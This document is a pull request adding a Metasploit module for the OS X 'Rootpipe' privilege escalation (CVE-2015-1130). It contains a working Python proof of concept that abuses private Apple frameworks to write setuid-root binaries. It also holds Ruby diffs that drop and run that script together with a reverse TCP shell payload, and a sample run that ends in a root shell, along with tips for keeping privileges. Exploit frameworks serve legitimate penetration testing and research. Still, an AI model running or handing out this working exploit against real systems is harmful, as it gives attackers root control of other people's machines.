### PR TITLE
Add Mac OS X "Rootpipe" privilege escalation exploit

### DIFF
--- a/data/exploits/CVE-2015-1130/exploit.py
+++ b/data/exploits/CVE-2015-1130/exploit.py
@@ -1,0 +1,73 @@
+########################################################
+#
+#  PoC exploit code for rootpipe (CVE-2015-1130)
+#
+#  Created by Emil Kvarnhammar, TrueSec
+#
+#  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
+#
+########################################################
+import os
+import sys
+import platform
+import re
+import ctypes
+import objc
+import sys
+from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
+from Foundation import NSAutoreleasePool
+
+def load_lib(append_path):
+    return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
+
+def use_old_api():
+    return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
+
+
+args = sys.argv
+
+if len(args) != 3:
+    print "usage: exploit.py source_binary dest_binary_as_root"
+    sys.exit(-1)
+
+source_binary = args[1]
+dest_binary = os.path.realpath(args[2])
+
+if not os.path.exists(source_binary):
+    raise Exception("file does not exist!")
+
+pool = NSAutoreleasePool.alloc().init()
+
+attr = NSMutableDictionary.alloc().init()
+attr.setValue_forKey_(04777, NSFilePosixPermissions)
+data = NSData.alloc().initWithContentsOfFile_(source_binary)
+
+print "will write file", dest_binary
+
+if use_old_api():
+    adm_lib = load_lib("/Admin.framework/Admin")
+    Authenticator = objc.lookUpClass("Authenticator")
+    ToolLiaison = objc.lookUpClass("ToolLiaison")
+    SFAuthorization = objc.lookUpClass("SFAuthorization")
+
+    authent = Authenticator.sharedAuthenticator()
+    authref = SFAuthorization.authorization()
+
+    # authref with value nil is not accepted on OS X <= 10.8
+    authent.authenticateUsingAuthorizationSync_(authref)
+    st = ToolLiaison.sharedToolLiaison()
+    tool = st.tool()
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
+else:
+    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
+    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
+    client = WriteConfigClient.sharedClient()
+    client.authenticateUsingAuthorizationSync_(None)
+    tool = client.remoteProxy()
+
+    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
+
+
+print "Done!"
+
+del pool

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -40,14 +40,14 @@ class Metasploit4 < Msf::Exploit::Local
       'Arch' => ARCH_X86_64,
       'SessionTypes' => ['shell', 'meterpreter'],
       'Targets' => [
-        ['Mac OS X 10.10.2 Yosemite x64 (Native Payload)', {}]
+        ['Mac OS X 10.9-10.10.2 x64 (Native Payload)', {}]
       ],
       'DefaultTarget' => 0
     ))
   end
 
   def check
-    if ver_lt(osx_ver, '10.10.3')
+    if ver_between(osx_ver, '10.9', '10.10.2')
       Exploit::CheckCode::Vulnerable
     else
       Exploit::CheckCode::Safe
@@ -78,8 +78,8 @@ class Metasploit4 < Msf::Exploit::Local
     cmd_exec('sw_vers -productVersion').to_s.strip
   end
 
-  def ver_lt(a, b)
-    Gem::Version.new(a) < Gem::Version.new(b)
+  def ver_between(a, b, c)
+    Gem::Version.new(a).between?(Gem::Version.new(b), Gem::Version.new(c))
   end
 
 end

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -9,86 +9,96 @@ class Metasploit4 < Msf::Exploit::Local
 
   Rank = GreatRanking
 
-  include Msf::Post::File
+  include Msf::Post::OSX::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'Mac OS X "Rootpipe" Privilege Escalation',
-      'Description' => %q{
+      'Name'           => 'Mac OS X "Rootpipe" Privilege Escalation',
+      'Description'    => %q{
         This module exploits a hidden backdoor API in Apple's Admin framework on
-        OS X to escalate privileges to root. Dubbed "Rootpipe."
+        Mac OS X to escalate privileges to root. Dubbed "Rootpipe."
 
         Tested on Yosemite 10.10.2 and should work on previous versions.
 
         The patch for this issue was not backported to older releases.
       },
-      'Author' => [
+      'Author'         => [
         'Emil Kvarnhammar', # Vulnerability discovery and PoC
-        'joev', # Copy/paste monkey
-        'wvu' # Meta copy/paste monkey
+        'joev',             # Copy/paste monkey
+        'wvu'               # Meta copy/paste monkey
       ],
-      'References' => [
-        ['CVE', '2015-1130'],
-        ['EDB', '36692'],
-        ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
+      'References'     => [
+        ['CVE',   '2015-1130'],
+        ['OSVDB', '114114'],
+        ['EDB',   '36692'],
+        ['URL',   'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
       ],
       'DisclosureDate' => 'Apr 9 2015',
-      'License' => MSF_LICENSE,
-      'Platform' => 'osx',
-      'Arch' => ARCH_X86_64,
-      'SessionTypes' => ['shell', 'meterpreter'],
-      'Targets' => [
-        ['Mac OS X 10.9-10.10.2 x64 (Native Payload)', {}]
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Targets'        => [
+        ['Mac OS X 10.9-10.10.2', {}]
       ],
-      'DefaultTarget' => 0,
+      'DefaultTarget'  => 0,
       'DefaultOptions' => {
         'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
-        'CMD' => '/bin/zsh'
+        'CMD'     => '/bin/zsh'
       }
     ))
 
     register_options([
-      OptString.new('TMPDIR', [true, 'Path to temp directory', '/tmp']),
-      OptString.new('PYTHON', [true, 'Path to Python', '/usr/bin/python'])
+      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
     ])
   end
 
   def check
-    if ver_between(osx_ver, '10.9', '10.10.2')
-      Exploit::CheckCode::Vulnerable
-    else
-      Exploit::CheckCode::Safe
-    end
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.9'), Gem::Version.new('10.10.2')
+    ) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
   end
 
   def exploit
-    exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
-    python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
-    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
-    exploit_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
-    payload_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
-
-    print_status("Writing exploit file as '#{exploit_file}'")
+    print_status("Writing exploit to `#{exploit_file}'")
     write_file(exploit_file, python_exploit)
     register_file_for_cleanup(exploit_file)
 
-    print_status("Writing payload file as '#{payload_file}'")
+    print_status("Writing payload to `#{payload_file}'")
     write_file(payload_file, binary_payload)
     register_file_for_cleanup(payload_file)
 
+    print_status('Executing exploit...')
+    cmd_exec(sploit)
     print_status('Executing payload...')
-    cmd_exec("#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}")
     cmd_exec(payload_file)
   end
 
-  def osx_ver
-    cmd_exec('sw_vers -productVersion').to_s.strip
+  def sploit
+    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
   end
 
-  def ver_between(a, b, c)
-    Gem::Version.new(a).between?(Gem::Version.new(b), Gem::Version.new(c))
+  def python_exploit
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'
+    ))
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def exploit_file
+    @exploit_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
   end
 
 end

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -23,6 +23,8 @@ class Metasploit4 < Msf::Exploit::Local
         Tested on Yosemite 10.10.2 and should work on previous versions.
 
         The patch for this issue was not backported to older releases.
+
+        Note: you must run this exploit as an admin user to escalate to root.
       },
       'Author'         => [
         'Emil Kvarnhammar', # Vulnerability discovery and PoC
@@ -57,9 +59,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def check
-    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
-      Gem::Version.new('10.9'), Gem::Version.new('10.10.2')
-    ) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+    (ver? && admin?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -75,6 +75,16 @@ class Metasploit4 < Msf::Exploit::Local
     cmd_exec(sploit)
     print_status('Executing payload...')
     cmd_exec(payload_file)
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.9'), Gem::Version.new('10.10.2')
+    )
+  end
+
+  def admin?
+    cmd_exec('groups | grep -wq admin && echo true') == 'true'
   end
 
   def sploit

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -42,8 +42,17 @@ class Metasploit4 < Msf::Exploit::Local
       'Targets' => [
         ['Mac OS X 10.9-10.10.2 x64 (Native Payload)', {}]
       ],
-      'DefaultTarget' => 0
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
+        'CMD' => '/bin/zsh'
+      }
     ))
+
+    register_options([
+      OptString.new('TMPDIR', [true, 'Path to temp directory', '/tmp']),
+      OptString.new('PYTHON', [true, 'Path to Python', '/usr/bin/python'])
+    ])
   end
 
   def check
@@ -58,8 +67,8 @@ class Metasploit4 < Msf::Exploit::Local
     exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
     python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
     binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
-    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
-    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    exploit_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payload_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
 
     print_status("Writing exploit file as '#{exploit_file}'")
     write_file(exploit_file, python_exploit)
@@ -70,7 +79,7 @@ class Metasploit4 < Msf::Exploit::Local
     register_file_for_cleanup(payload_file)
 
     print_status('Executing payload...')
-    cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}")
+    cmd_exec("#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}")
     cmd_exec(payload_file)
   end
 

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Mac OS X "Rootpipe" Privilege Escalation',
+      'Description' => %q{
+        This module exploits a hidden backdoor API in Apple's Admin framework on
+        OS X to escalate privileges to root. Dubbed "Rootpipe."
+
+        Tested on Yosemite 10.10.2 and should work on previous versions.
+
+        The patch for this issue was not backported to older releases.
+      },
+      'Author' => [
+        'Emil Kvarnhammar', # Vulnerability discovery and PoC
+        'joev', # Copy/paste monkey
+        'wvu' # Meta copy/paste monkey
+      ],
+      'References' => [
+        ['CVE', '2015-1130'],
+        ['EDB', '36692'],
+        ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
+      ],
+      'DisclosureDate' => 'Apr 9 2015',
+      'License' => MSF_LICENSE,
+      'Platform' => 'osx',
+      'Arch' => ARCH_X86_64,
+      'SessionTypes' => ['shell', 'meterpreter'],
+      'Targets' => [
+        ['Mac OS X 10.10.2 Yosemite x64 (Native Payload)', {}]
+      ],
+      'DefaultTarget' => 0
+    ))
+  end
+
+  def check
+    if ver_lt(osx_ver, '10.10.3')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
+    python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
+    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+
+    print_status("Writing exploit file as '#{exploit_file}'")
+    write_file(exploit_file, python_exploit)
+    register_file_for_cleanup(exploit_file)
+
+    print_status("Writing payload file as '#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+
+    print_status('Executing payload...')
+    cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}")
+    cmd_exec(payload_file)
+  end
+
+  def osx_ver
+    cmd_exec('sw_vers -productVersion').to_s.strip
+  end
+
+  def ver_lt(a, b)
+    Gem::Version.new(a) < Gem::Version.new(b)
+  end
+
+end


### PR DESCRIPTION
### Feature Description

All here: https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/.

Great post!
### Implementation Notes

This started life as a copypasta of @joevennix's `iokit_keyboard_root` exploit. :)

Be aware that `bash` drops privs unless you specify `-p`. If you can call `setreuid()`, do it.

**Update:** I am using `zsh` as a workaround for `/bin/sh -p` and `PrependSetreuid` not working at the moment.
### Verification Steps
- [x] Get an admin shell
- [x] Run the exploit
- [x] Get a root shell
### Sample Run

```
msf exploit(handler) > use exploit/osx/local/rootpipe 
msf exploit(rootpipe) > set session -1
session => -1
msf exploit(rootpipe) > run

[*] Started reverse handler on [redacted]:4444 
[*] Writing exploit to `/.Trashes/PIcVnGFd'
[*] Writing payload to `/.Trashes/HvrUAWcG'
[*] Executing exploit...
[*] Executing payload...
[*] Command shell session 2 opened ([redacted]:4444 -> [redacted]:59723) at 2015-04-10 10:32:26 -0500
[+] Deleted /.Trashes/PIcVnGFd
[+] Deleted /.Trashes/HvrUAWcG

3781518426
vNjyrtqiaaTqcnBbSECrNjYwgTfLucFT
AQqgBSlMQHiAnQRBiIINUmwJeFvdfFik
fLgcrtgzdwyibLpVXlsbninXurCaeFVT
whoami
root
```
